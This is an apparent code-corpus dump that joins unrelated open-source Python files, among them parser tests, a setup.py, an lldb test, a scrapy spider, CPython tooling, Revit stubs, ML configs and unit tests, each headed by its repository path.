width = (m := len(mat)) * (n := len(mat[0]))
mat = functools.reduce(
lambda x, y: (x << 1) | y,
(val for row in mat for val in row),
0
)
flips, bfs, seen = 0, {mat}, {mat}
awidth, lwidth = width - n, n - 1
nshifts = itertools.cycle(range(n))
while bfs:
next_bfs = set()
for curr in bfs:
if curr == 0:
return flips
for shift, nshift in zip(range(width), nshifts):
cand = curr ^ (1 << shift)
if shift < awidth:
cand ^= 1 << (shift + n) # above
if shift >= n:
cand ^= 1 << (shift - n) # below
if nshift < lwidth:
cand ^= 1 << (shift + 1) # left
if nshift > 0:
cand ^= 1 << (shift - 1) # right
if cand not in seen:
seen.add(cand)
next_bfs.add(cand)
flips, bfs = flips + 1, next_bfs
return -1
__________________________________________________________________________________________________
|
insights/parsers/tests/test_tuned.py | maxamillion/insights-core | 121 | 12745866 | import pytest
import doctest
from insights.parsers import SkipException, tuned
from insights.parsers.tuned import Tuned
from insights.tests import context_wrap
TUNED_OUTPUT = '''
Available profiles:
- balanced
- desktop
- latency-performance
- network-latency
- network-throughput
- powersave
- throughput-performance
- virtual-guest
- virtual-host
Current active profile: virtual-guest
'''.strip()
TUNED_OUTPUT2 = '''
Available profiles:
- balanced
- desktop
- latency-performance
- network-latency
- network-throughput
- powersave
- throughput-performance
- virtual-guest
- virtual-host
It seems that tuned daemon is not running, preset profile is not activated.
Preset profile: virtual-guest
'''.strip()
TUNED_OUTPUT3 = '''
Available profiles:
- balanced - General non-specialized tuned profile
- desktop - Optimize for the desktop use-case
- hpc-compute - Optimize for HPC compute workloads
- latency-performance - Optimize for deterministic performance at the cost of increased power consumption
- network-latency - Optimize for deterministic performance at the cost of increased power consumption, focused on low latency network performance
- network-throughput - Optimize for streaming network throughput, generally only necessary on older CPUs or 40G+ networks
- powersave - Optimize for low power consumption
- sap-netweaver - Optimize for SAP NetWeaver
- throughput-performance - Broadly applicable tuning that provides excellent performance across a variety of common server workloads
- virtual-guest - Optimize for running inside a virtual guest
- virtual-guest-vmware
- virtual-host - Optimize for running KVM guests
Current active profile: virtual-guest-vmware
'''.strip()
TUNED_OUTPUT4 = '''
'''.strip()
def test_active_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT))
assert len(tuned_output.get('available')) == 9
assert tuned_output.get('active') == 'virtual-guest'
assert tuned_output.get('available') == ['balanced',
'desktop',
'latency-performance',
'network-latency',
'network-throughput',
'powersave',
'throughput-performance',
'virtual-guest',
'virtual-host']
def test_preset_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT2))
assert len(tuned_output.get('available')) == 9
assert tuned_output.get('preset') == 'virtual-guest'
assert tuned_output.get('available') == ['balanced',
'desktop',
'latency-performance',
'network-latency',
'network-throughput',
'powersave',
'throughput-performance',
'virtual-guest',
'virtual-host']
def test_tuned_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT3))
assert len(tuned_output.get('available')) == 12
assert tuned_output.get('preset') is None
assert tuned_output.get('active') == 'virtual-guest-vmware'
assert 'sap-netweaver' in tuned_output.get('available')
assert 'virtual-guest-vmware' in tuned_output.get('available')
with pytest.raises(SkipException):
Tuned(context_wrap(''))
def test_doc_example():
env = {'tuned': Tuned(context_wrap(TUNED_OUTPUT))}
failed, total = doctest.testmod(tuned, globs=env)
assert failed == 0
|
setup.py | CodeBrew-LTD/django-hordak | 187 | 12745891 | <gh_stars>100-1000
#!/usr/bin/env python
from os.path import exists
from setuptools import setup, find_packages
setup(
name="django-hordak",
version=open("VERSION").read().strip(),
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
scripts=[],
url="https://github.com/adamcharnock/django-hordak",
license="MIT",
description="Double entry book keeping in Django",
long_description=open("README.rst").read() if exists("README.rst") else "",
include_package_data=True,
install_requires=[
"django>=1.10",
"django-mptt>=0.8",
"django-model-utils>=2.5.0",
"dj-database-url>=0.4.1",
"psycopg2-binary>=2.6.2",
"django-extensions>=1.7.3",
"django-smalluuid>=1.1.1",
"requests>=2",
"py-moneyed>=0.6.0",
"django-money>=0.9.1",
"django-import-export>=0.5.0",
"babel==2.5.1",
'openpyxl<=2.6;python_version<"3.5"',
],
)
|
lldb/test/API/tools/lldb-server/TestGdbRemoteCompletion.py | Machiry/checkedc-clang | 250 | 12745898 | <filename>lldb/test/API/tools/lldb-server/TestGdbRemoteCompletion.py
import tempfile
import gdbremote_testcase
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
from lldbgdbserverutils import *
class GdbRemoteCompletionTestCase(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def init_lldb_server(self):
self.debug_monitor_exe = get_lldb_server_exe()
if not self.debug_monitor_exe:
self.skipTest("lldb-server exe not found")
port_file = tempfile.NamedTemporaryFile().name
commandline_args = [
"platform",
"--listen",
"*:0",
"--socket-file",
port_file
]
server = self.spawnSubprocess(
get_lldb_server_exe(),
commandline_args,
install_remote=False)
self.assertIsNotNone(server)
self.stub_hostname = "localhost"
self.port = int(lldbutil.wait_for_file_on_target(self, port_file))
self.sock = self.create_socket()
self._server = Server(self.sock, server)
self.add_no_ack_remote_stream()
def generate_hex_path(self, target):
return str(os.path.join(self.getBuildDir(), target)).encode().hex()
@add_test_categories(["llgs"])
def test_autocomplete_path(self):
self.build()
self.init_lldb_server()
# Test file-included completion when flag is set to 0.
self.test_sequence.add_log_lines(
["read packet: $qPathComplete:0,{}#00".format(
self.generate_hex_path("main")),
"send packet: $M{},{}#00".format(
self.generate_hex_path("main.d"),
self.generate_hex_path("main.o"))
],
True)
# Test directory-only completion when flag is set to 1.
os.makedirs(os.path.join(self.getBuildDir(), "test"))
self.test_sequence.add_log_lines(
["read packet: $qPathComplete:1,{}#00".format(
self.generate_hex_path("tes")),
"send packet: $M{}{}#00".format(
self.generate_hex_path("test"),
os.path.sep.encode().hex()) # "test/" or "test\".
],
True)
self.expect_gdbremote_sequence()
|
locations/spiders/bonefishgrill.py | davidchiles/alltheplaces | 297 | 12745911 | # -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
'Monday': 'Mo',
'Tuesday': 'Tu',
'Wednesday': 'We',
'Thursday': 'Th',
'Friday': 'Fr',
'Saturday': 'Sa',
'Sunday': 'Su'
}
class BoneFishGrillSpider(scrapy.Spider):
download_delay = 0.2
name = "bonefishgrill"
allowed_domains = ["bonefishgrill.com"]
start_urls = (
'https://www.bonefishgrill.com/locations/all',
)
def parse(self, response):
urls = response.xpath('//li[@class="location-row"]/a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse_location(self, response):
data = response.xpath('//script[contains(text(), "initLocationDetail")][1]/text()').extract_first()
try:
properties = {
'ref': re.search(r'"UnitId":"(.*?)"', data).group(1),
'name': re.search(r'"City":"(.*?)"', data).group(1),
'addr_full': re.search(r'"Address":"(.*?)"', data).group(1),
'city': re.search(r'"City":"(.*?)"', data).group(1),
'state': re.search(r'"State":"(.*?)"', data).group(1),
'postcode': re.search(r'"Zip":"(.*?)"', data).group(1),
'phone': re.search(r'"Phone":"(.*?)"', data).group(1),
'lat': re.search(r'"Latitude":"(.*?)"', data).group(1),
'lon': re.search(r'"Longitude":"(.*?)"', data).group(1),
'website': response.url
}
hours = self.parse_hours(re.search(r'"Hours":(.*?})', data).group(1))
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
except:
pass
def parse_hours(self, response):
opening_hours = OpeningHours()
weekdays = response
hrs = json.loads(weekdays)
WEEKDAYS = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for DAY in WEEKDAYS:
open = hrs.get(DAY+'Open')
close = hrs.get(DAY+'Close')
opening_hours.add_range(day=DAY_MAPPING[DAY],
open_time=open,
close_time=close,
time_format='%H:%M %p')
return opening_hours.as_opening_hours() |
tests/package_extract/extract.py | AppliedIntuition/subpar | 546 | 12745956 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration test program for Subpar
Tests file extraction functionality (zip_safe=False)
"""
import os
import pkgutil
import sys
def main():
print('In extract.py main()')
# Test that imports are from real files on disk. Slightly tricky
# to test, since the 'subpar' package is imported before we
# extract and setup sys.path, so we can't "import subpar.test.something"
import extract_helper
assert os.path.isfile(extract_helper.__file__), (
extract_helper.__file__, sys.path)
import extract_helper_package
assert os.path.isfile(extract_helper_package.__file__), (
extract_helper_package.__file__, sys.path)
# Test resource extraction
dat = pkgutil.get_data('extract_helper_package', 'extract_dat.txt')
assert (dat == b'Dummy data file for extract.py\n'), dat
if __name__ == '__main__':
main()
|
hack/mkdocs_macros/feature_stability_table.py | javipolo/kops | 14,563 | 12745976 | <reponame>javipolo/kops<filename>hack/mkdocs_macros/feature_stability_table.py
#!/usr/bin/env python
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def define_env(env):
"""Hook function"""
@env.macro
def kops_feature_table(**kwargs):
"""
Generate a markdown table which will be rendered when called, along with the supported passed keyword args.
:param kwargs:
kops_added_ff => Kops version in which this feature was added as a feature flag
kops_added_default => Kops version in which this feature was introduced as stable
k8s_min => Minimum k8s version which supports this feature
:return: rendered markdown table
"""
# this dict object maps the kwarg to its description, which will be used in the final table
supported_args = {
'kops_added_ff': 'Alpha (Feature Flag)',
'kops_added_default': 'Default',
'k8s_min': 'Minimum K8s Version'
}
# Create the initial strings to which we'll concatenate the relevant columns
title = '|'
separators = '|'
values = '|'
# Iterate over provided supported kwargs and match them with the provided values.
for arg, header in supported_args.items():
if arg not in kwargs.keys():
continue
if arg == 'kops_added_default' and 'kops_added_ff' not in kwargs.keys():
title += ' Introduced |'
else:
title += f' {header} |'
separators += ' :-: |'
if arg == 'k8s_min':
values += f' K8s {kwargs[arg]} |'
else:
values += f' Kops {kwargs[arg]} |'
# Create a list object containing all the table rows,
# Then return a string object which contains every list item in a new line.
table = [
title,
separators,
values
]
return '\n'.join(table)
def main():
pass
if __name__ == "__main__":
main()
|
src/main/python/com/bluehonour/utils/get_stock_data_path.py | kingmoon3/stock-data-analysis-and-prediction | 162 | 12745978 | #!/usr/bin/python
import sys
import os
import shutil
from readConfig import *
def get_stock_data_path():
config = ReadConfig()
path = config.find_path("config.ini")
config.__read__(path)
stock_path = config.get_stock("path")
if not os.path.exists(stock_path):
os.makedirs(stock_path)
return stock_path
def mkdir(directory):
"""
如果directory不存在则创建,如果存在删除该目录下所有内容
:param directory: 路径
:return:
"""
if os.path.exists(directory):
shutil.rmtree(directory)
os.makedirs(directory)
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/CurveLoopIterator.py | htlcnn/ironpython-stubs | 182 | 12745990 | class CurveLoopIterator(object,IEnumerator[Curve],IDisposable,IEnumerator):
""" An iterator to a curve loop. """
def Dispose(self):
""" Dispose(self: CurveLoopIterator) """
pass
def MoveNext(self):
"""
MoveNext(self: CurveLoopIterator) -> bool
Increments the iterator to the next item.
Returns: True if there is a next available item in this iterator.
False if the
iterator has completed all available items.
"""
pass
def next(self,*args):
""" next(self: object) -> object """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: CurveLoopIterator,disposing: bool) """
pass
def Reset(self):
"""
Reset(self: CurveLoopIterator)
Resets the iterator to the initial state.
"""
pass
def __contains__(self,*args):
""" __contains__[Curve](enumerator: IEnumerator[Curve],value: Curve) -> bool """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerator) -> object """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
Current=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the item at the current position of the iterator.
Get: Current(self: CurveLoopIterator) -> Curve
"""
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: CurveLoopIterator) -> bool
"""
|
Tools/scripts/generate_stdlib_module_names.py | oleksandr-pavlyk/cpython | 52,316 | 12746022 | <filename>Tools/scripts/generate_stdlib_module_names.py
# This script lists the names of standard library modules
# to update Python/stdlib_mod_names.h
import _imp
import os.path
import re
import subprocess
import sys
import sysconfig
SRC_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
STDLIB_PATH = os.path.join(SRC_DIR, 'Lib')
MODULES_SETUP = os.path.join(SRC_DIR, 'Modules', 'Setup')
SETUP_PY = os.path.join(SRC_DIR, 'setup.py')
IGNORE = {
'__init__',
'__pycache__',
'site-packages',
# Test modules and packages
'__hello__',
'__phello__',
'__hello_alias__',
'__phello_alias__',
'__hello_only__',
'_ctypes_test',
'_testbuffer',
'_testcapi',
'_testconsole',
'_testimportmultiple',
'_testinternalcapi',
'_testmultiphase',
'_xxsubinterpreters',
'_xxtestfuzz',
'distutils.tests',
'idlelib.idle_test',
'lib2to3.tests',
'test',
'xxlimited',
'xxlimited_35',
'xxsubtype',
}
# Windows extension modules
WINDOWS_MODULES = (
'_msi',
'_overlapped',
'_testconsole',
'_winapi',
'msvcrt',
'nt',
'winreg',
'winsound'
)
# macOS extension modules
MACOS_MODULES = (
'_scproxy',
)
# Pure Python modules (Lib/*.py)
def list_python_modules(names):
for filename in os.listdir(STDLIB_PATH):
if not filename.endswith(".py"):
continue
name = filename.removesuffix(".py")
names.add(name)
# Packages in Lib/
def list_packages(names):
for name in os.listdir(STDLIB_PATH):
if name in IGNORE:
continue
package_path = os.path.join(STDLIB_PATH, name)
if not os.path.isdir(package_path):
continue
if any(package_file.endswith(".py")
for package_file in os.listdir(package_path)):
names.add(name)
# Extension modules built by setup.py
def list_setup_extensions(names):
cmd = [sys.executable, SETUP_PY, "-q", "build", "--list-module-names"]
output = subprocess.check_output(cmd)
output = output.decode("utf8")
extensions = output.splitlines()
names |= set(extensions)
# Built-in and extension modules built by Modules/Setup
def list_modules_setup_extensions(names):
assign_var = re.compile("^[A-Z]+=")
with open(MODULES_SETUP, encoding="utf-8") as modules_fp:
for line in modules_fp:
# Strip comment
line = line.partition("#")[0]
line = line.rstrip()
if not line:
continue
if assign_var.match(line):
# Ignore "VAR=VALUE"
continue
if line in ("*disabled*", "*shared*"):
continue
parts = line.split()
if len(parts) < 2:
continue
# "errno errnomodule.c" => write "errno"
name = parts[0]
names.add(name)
# List frozen modules of the PyImport_FrozenModules list (Python/frozen.c).
# Use the "./Programs/_testembed list_frozen" command.
def list_frozen(names):
submodules = set()
for name in _imp._frozen_module_names():
# To skip __hello__, __hello_alias__ and etc.
if name.startswith('__'):
continue
if '.' in name:
submodules.add(name)
else:
names.add(name)
# Make sure all frozen submodules have a known parent.
for name in list(submodules):
if name.partition('.')[0] in names:
submodules.remove(name)
if submodules:
raise Exception(f'unexpected frozen submodules: {sorted(submodules)}')
def list_modules():
names = set(sys.builtin_module_names) | set(WINDOWS_MODULES) | set(MACOS_MODULES)
list_modules_setup_extensions(names)
list_setup_extensions(names)
list_packages(names)
list_python_modules(names)
list_frozen(names)
# Remove ignored packages and modules
for name in list(names):
package_name = name.split('.')[0]
# package_name can be equal to name
if package_name in IGNORE:
names.discard(name)
for name in names:
if "." in name:
raise Exception("sub-modules must not be listed")
return names
def write_modules(fp, names):
print("// Auto-generated by Tools/scripts/generate_stdlib_module_names.py.",
file=fp)
print("// List used to create sys.stdlib_module_names.", file=fp)
print(file=fp)
print("static const char* _Py_stdlib_module_names[] = {", file=fp)
for name in sorted(names):
print(f'"{name}",', file=fp)
print("};", file=fp)
def main():
if not sysconfig.is_python_build():
print(f"ERROR: {sys.executable} is not a Python build",
file=sys.stderr)
sys.exit(1)
fp = sys.stdout
names = list_modules()
write_modules(fp, names)
if __name__ == "__main__":
main()
|
ports/teensy/memzip_files/main.py | sebastien-riou/micropython | 13,648 | 12746040 | import pyb
print("Executing main.py")
led = pyb.LED(1)
led.on()
pyb.delay(100)
led.off()
pyb.delay(100)
led.on()
pyb.delay(100)
led.off()
|
examples/lists/tests.py | jpwatts/django-positions | 118 | 12746047 | import time
import doctest
import unittest
from examples.lists.models import List, Item
from django.test import TestCase
class GenericTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
# @unittest.skip("Some reason. If you are reading this in a test run someone did not fill this in.")
def test_doctests_standin(self):
# This code just contains the old doctests for this module. They should be most likely split out into their own
# tests at some point.
self.l = List.objects.create(name='To Do')
# create a couple items using the default position
result = self.l.items.create(name='Write Tests').name
expected_result = 'Write Tests'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position'))
expected_result = [(u'Write Tests', 0)]
self.assertEqual(result, expected_result)
result = self.l.items.create(name='Exercise').name
expected_result = 'Exercise'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1)]
self.assertEqual(result, expected_result)
# create an item with an explicit position
result = self.l.items.create(name='Learn to spell Exercise', position=0).name
expected_result = 'Learn to spell Exercise'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Learn to spell Exercise', 0), (u'Write Tests', 1), (u'Exercise', 2)]
self.assertEqual(result, expected_result)
# save an item without changing it's position
self.exercise = self.l.items.order_by('-position')[0]
self.exercise.name = 'Exercise'
self.exercise.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Learn to spell Exercise', 0), (u'Write Tests', 1), (u'Exercise', 2)]
self.assertEqual(result, expected_result)
# delete an item
self.learn_to_spell = self.l.items.order_by('position')[0]
self.learn_to_spell.delete()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1)]
self.assertEqual(result, expected_result)
# create a couple more items
result = self.l.items.create(name='Drink less Coke').name
expected_result = 'Drink less Coke'
self.assertEqual(result, expected_result)
result = self.l.items.create(name='Go to Bed').name
expected_result = 'Go to Bed'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1), (u'Drink less Coke', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to end using None
self.write_tests = self.l.items.order_by('position')[0]
self.write_tests.position = None
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Drink less Coke', 1), (u'Go to Bed', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
# move item using negative index
self.write_tests.position = -3
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Write Tests', 1), (u'Drink less Coke', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to position
self.write_tests.position = 2
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Drink less Coke', 1), (u'Write Tests', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to beginning
self.sleep = self.l.items.order_by('-position')[0]
self.sleep.position = 0
self.sleep.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Exercise', 1), (u'Drink less Coke', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
# check auto_now updates
time.sleep(1) # sleep to guarantee updated time increases
sleep_updated, exercise_updated, eat_better_updated, write_tests_updated = [i.updated for i in self.l.items.order_by('position')]
self.eat_better = self.l.items.order_by('-position')[1]
self.eat_better.position = 1
self.eat_better.save()
self.todo_list = list(self.l.items.order_by('position'))
self.assertEqual(sleep_updated, self.todo_list[0].updated)
self.assertLessEqual(eat_better_updated, self.todo_list[1].updated)
self.assertLessEqual(exercise_updated, self.todo_list[2].updated)
# create an item using negative index
# http://github.com/jpwatts/django-positions/issues/#issue/5
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
self.fix_issue_5 = Item(list=self.l, name="Fix Issue #5")
result = self.fix_issue_5.position
expected_result = -1
self.assertEqual(result, expected_result)
self.fix_issue_5.position = -2
result = self.fix_issue_5.position
expected_result = -2
self.assertEqual(result, expected_result)
self.fix_issue_5.save()
result = self.fix_issue_5.position
expected_result = 3
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Fix Issue #5', 3), (u'Write Tests', 4)]
self.assertEqual(result, expected_result)
# Try again, now that the model has been saved.
self.fix_issue_5.position = -2
self.fix_issue_5.save()
result = self.fix_issue_5.position
expected_result = 3
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Fix Issue #5', 3), (u'Write Tests', 4)]
self.assertEqual(result, expected_result)
# create an item using with a position of zero
# http://github.com/jpwatts/django-positions/issues#issue/7
self.item0 = self.l.items.create(name="Fix Issue #7", position=0)
result = self.item0.position
expected_result = 0
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Fix Issue #7', 0), (u'Go to Bed', 1), (u'Drink less Coke', 2), (u'Exercise', 3), (u'Fix Issue #5', 4), (u'Write Tests', 5)]
self.assertEqual(result, expected_result)
|
malaya_speech/config/hifigan.py | dtx525942103/malaya-speech | 111 | 12746123 | config = {
'sampling_rate': 22050,
'hop_size': 256,
'model_type': 'hifigan_generator',
'hifigan_generator_params': {
'out_channels': 1,
'kernel_size': 7,
'filters': 128,
'use_bias': True,
'upsample_scales': [8, 8, 2, 2],
'stacks': 3,
'stack_kernel_size': [3, 7, 11],
'stack_dilation_rate': [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
'use_final_nolinear_activation': True,
'is_weight_norm': False,
},
'hifigan_discriminator_params': {
'out_channels': 1,
'period_scales': [2, 3, 5, 7, 11],
'n_layers': 5,
'kernel_size': 5,
'strides': 3,
'filters': 8,
'filter_scales': 4,
'max_filters': 512,
'is_weight_norm': False,
},
'melgan_discriminator_params': {
'out_channels': 1,
'scales': 3,
'downsample_pooling': 'AveragePooling1D',
'downsample_pooling_params': {'pool_size': 4, 'strides': 2},
'kernel_sizes': [5, 3],
'filters': 16,
'max_downsample_filters': 512,
'downsample_scales': [4, 4, 4, 4],
'nonlinear_activation': 'LeakyReLU',
'nonlinear_activation_params': {'alpha': 0.2},
'is_weight_norm': False,
},
'stft_loss_params': {
'fft_lengths': [1024, 2048, 512],
'frame_steps': [120, 240, 50],
'frame_lengths': [600, 1200, 240],
},
'lambda_feat_match': 10.0,
'lambda_adv': 4.0,
'batch_size': 16,
'batch_max_steps': 8192,
'batch_max_steps_valid': 81920,
'remove_short_samples': True,
'allow_cache': True,
'is_shuffle': True,
}
|
paddlespeech/text/exps/ernie_linear/test.py | JiehangXie/PaddleSpeech | 1,540 | 12746129 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import numpy as np
import paddle
import pandas as pd
import yaml
from paddle import nn
from paddle.io import DataLoader
from sklearn.metrics import classification_report
from sklearn.metrics import precision_recall_fscore_support
from yacs.config import CfgNode
from paddlespeech.text.models.ernie_linear import ErnieLinear
from paddlespeech.text.models.ernie_linear import PuncDataset
from paddlespeech.text.models.ernie_linear import PuncDatasetFromErnieTokenizer
DefinedClassifier = {
'ErnieLinear': ErnieLinear,
}
DefinedLoss = {
"ce": nn.CrossEntropyLoss,
}
DefinedDataset = {
'Punc': PuncDataset,
'Ernie': PuncDatasetFromErnieTokenizer,
}
def evaluation(y_pred, y_test):
precision, recall, f1, _ = precision_recall_fscore_support(
y_test, y_pred, average=None, labels=[1, 2, 3])
overall = precision_recall_fscore_support(
y_test, y_pred, average='macro', labels=[1, 2, 3])
result = pd.DataFrame(
np.array([precision, recall, f1]),
columns=list(['O', 'COMMA', 'PERIOD', 'QUESTION'])[1:],
index=['Precision', 'Recall', 'F1'])
result['OVERALL'] = overall[:3]
return result
def test(args):
with open(args.config) as f:
config = CfgNode(yaml.safe_load(f))
print("========Args========")
print(yaml.safe_dump(vars(args)))
print("========Config========")
print(config)
test_dataset = DefinedDataset[config["dataset_type"]](
train_path=config["test_path"], **config["data_params"])
test_loader = DataLoader(
test_dataset,
batch_size=config.batch_size,
shuffle=False,
drop_last=False)
model = DefinedClassifier[config["model_type"]](**config["model"])
state_dict = paddle.load(args.checkpoint)
model.set_state_dict(state_dict["main_params"])
model.eval()
punc_list = []
for i in range(len(test_loader.dataset.id2punc)):
punc_list.append(test_loader.dataset.id2punc[i])
test_total_label = []
test_total_predict = []
for i, batch in enumerate(test_loader):
input, label = batch
label = paddle.reshape(label, shape=[-1])
y, logit = model(input)
pred = paddle.argmax(logit, axis=1)
test_total_label.extend(label.numpy().tolist())
test_total_predict.extend(pred.numpy().tolist())
t = classification_report(
test_total_label, test_total_predict, target_names=punc_list)
print(t)
t2 = evaluation(test_total_label, test_total_predict)
print('=========================================================')
print(t2)
def main():
# parse args and config and redirect to train_sp
parser = argparse.ArgumentParser(description="Test a ErnieLinear model.")
parser.add_argument("--config", type=str, help="ErnieLinear config file.")
parser.add_argument("--checkpoint", type=str, help="snapshot to load.")
parser.add_argument(
"--ngpu", type=int, default=1, help="if ngpu=0, use cpu.")
args = parser.parse_args()
if args.ngpu == 0:
paddle.set_device("cpu")
elif args.ngpu > 0:
paddle.set_device("gpu")
else:
print("ngpu should >= 0 !")
test(args)
if __name__ == "__main__":
main()
|
tests/unit/fixtures/fail_exporter.py | ClementPruvot/slo-generator | 243 | 12746139 | <filename>tests/unit/fixtures/fail_exporter.py
"""dummy_exporter.py
Dummy exporter implementation for testing.
"""
# pylint: disable=missing-class-docstring
from slo_generator.exporters.base import MetricsExporter
class FailExporter(MetricsExporter):
def export_metric(self, data):
raise ValueError("Oops !")
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/GridNode.py | htlcnn/ironpython-stubs | 182 | 12746140 | class GridNode(object):
"""
A structure that represents a particular location in (U,V) from a grid.
GridNode(uIndex: int,vIndex: int)
"""
@staticmethod
def __new__(self,uIndex,vIndex):
"""
__new__[GridNode]() -> GridNode
__new__(cls: type,uIndex: int,vIndex: int)
"""
pass
UIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The node's index along the U axis.
Get: UIndex(self: GridNode) -> int
Set: UIndex(self: GridNode)=value
"""
VIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The node's index along the V axis.
Get: VIndex(self: GridNode) -> int
Set: VIndex(self: GridNode)=value
"""
|
tilecloud/tests/test_bounds.py | camptocamp/tilecloud | 134 | 12746147 | import unittest
from tilecloud import Bounds
class TestBounds(unittest.TestCase):
def test_empty(self) -> None:
bounds = Bounds()
assert len(bounds) == 0
assert 1 not in bounds
self.assertRaises(StopIteration, next, iter(bounds))
assert bounds == bounds
def test_init_one_argument(self) -> None:
bounds = Bounds(1)
assert list(bounds) == [1]
def test_init_two_arguments(self) -> None:
bounds = Bounds(1, 3)
assert list(bounds) == [1, 2]
def test_add(self) -> None:
bounds = Bounds()
assert len(bounds) == 0
bounds.add(1)
assert list(bounds) == [1]
bounds.add(1)
assert list(bounds) == [1]
bounds.add(2)
assert list(bounds) == [1, 2]
def test_update(self) -> None:
bounds1 = Bounds(1, 3)
bounds2 = Bounds(3, 5)
self.assertTrue(bounds1.update(bounds2) is bounds1)
self.assertEqual(len(bounds1), 4)
self.assertEqual(list(bounds1), [1, 2, 3, 4])
def test_update_empty(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds(3, 5)
assert bounds1.update(bounds2) is bounds1
assert list(bounds1) == [3, 4]
def test_union_empty_empty(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds()
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert len(bounds3) == 0
def test_union_empty_normal(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds(3, 5)
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [3, 4]
def test_union_normal_empty(self) -> None:
